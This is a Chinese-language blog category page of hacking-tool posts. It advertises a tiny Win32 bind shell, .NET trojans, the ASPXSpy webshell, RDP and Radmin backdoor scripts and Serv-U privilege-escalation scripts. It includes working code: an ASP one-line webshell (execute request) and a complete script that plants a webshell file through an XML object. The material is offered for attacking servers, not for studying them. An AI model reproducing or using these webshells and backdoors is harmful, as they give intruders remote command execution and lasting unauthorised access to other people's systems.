分类 ‘工具收集’ 下的日志

Win32最小的多用户Shell 1.2 506字节

作者:Anskya
来源:邪恶八进制

BindShell.体积仅有506字节!!!!
优化到这样估计也很难在优化下去了。。。能写的地方基本上都写满了
这个东西也暂时告一段楼。。。

祝大家新年新气象。。。
开开心心过好年,也为回不了家的朋友们祝福一下
没事,无聊了找兄弟一起吹水看Hot!聊MM。。。
无聊了PM我

下载地址:acom3.rar

JSP版MSSQL连接工具

来源:King's Blog

<%@ page import="java.sql.*" contentType="text/html; charset=GBK"%>
<%@ page import="java.util.*"%>
<html>
<head>
<title>rootkit</title>
<script type="javascript">
var db = "master";
function getTables() {
window.open("<%=request.getRequestURL().toString()%>?action=getTables&db="+db,"","scrollbars=yes");
}

阅读全文 »

Tags: ,

几个.net的马

来源:红狼

1k 的
阅读全文 »

Tags:

ASPXSpy 1.0

作者:Bin
来源:Bin-Blog

Readme:

1.开发环境VS2005 + C#,兼容FrameWork1.1/2.0,基本实现代码分离。

2.密码为32位MD5加密(小写) 默认为 admin.

3.采用POST方式提交数据,增强了隐蔽性。

4.添加了IIS探测功能,遍历IIS站点信息。

5.增强了对文件属性的修改。

6.在SQLTools中增加了,SA权限执行系统命令功能,SQL_DIR 功能,可以直接备份log/database,到指定目录。
文件名为bin.asp Shell 为<%execute request(“B”)%>

7.增加了 Serv-u 提权功能.

8.可以对端口实现单线程扫描。

9.可以对注册表进行简单的读取.
阅读全文 »

Tags: ,

xp、2003开3389+非net创建管理用户+Shift后门+自删除脚本vbs

作者:孤狐浪子
来源:红狼

阅读全文 »

Tags: ,

Vbs脚本实现radmin终极后门

作者:孤狐浪子
来源:红狼

在网上看到N多人做radmin后门,要导出注册表而且还用被杀软件K杀。所以本人把自己写的脚本提供大家分享。比较实用,希望大家喜欢。
阅读全文 »

Tags: ,

Serv-U 6.X 提权脚本

Author:落叶纷飞
来源:http://www.cnsst.org/
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP

阅读全文 »

Tags: ,

xml写马

来源:WEB安全手册|Trace's Space

<%
set xmldoc = Server.CreateObject("Msxml2.DOMDocument.3.0")
xmldoc.loadXml("<p></p>")
xmldoc.documentElement.appendChild xmldoc.createComment("<"+"% execute(request(chr(35))) %"+ ">")
xmldoc.save(server.mappath("sample.asp"))
Response.Redirect "sample.asp"
%>

Tags: